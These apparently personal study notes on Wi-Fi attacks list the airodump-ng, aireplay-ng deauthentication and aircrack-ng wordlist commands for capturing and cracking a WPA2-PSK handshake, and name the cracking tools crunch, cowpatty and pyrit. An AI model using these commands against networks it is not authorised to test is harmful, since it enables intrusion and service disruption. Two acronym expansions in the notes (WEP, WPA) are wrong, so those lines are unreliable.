Index

WIRELESS NETWORK

  1. Wi-Fi HACKING
    1. AIRCRACK-ng
    2. MAC SPOOFING
    3. NETWORK SNIFFER
    4. DoS ATTACK
    5. CRACKING

CRACKING

WEP(Wired Equivalent Policy) => wifite : older and less secure. not common

WPA/WPA2(Wireless Protected Access)
• Developed by Wi-Fi Alliance
• WPA2 uses AES (Advanced Encryption Standard)

WPA2-PSK(Pre-Shared Key)
• Provide a plain english passphrase btwn 8-63 characters

airodump-ng -c [ ] -w wpa --bssid [ ] wlan0mon
aireplay-ng -0 20 -a [ ] wlan0mon : 20 packetsof De-authentication for a handshake to happen after the deauth
aircrack-ng -w [wordlist] wpa-01.cap

CRUNCH
COWPATTY
PYRIT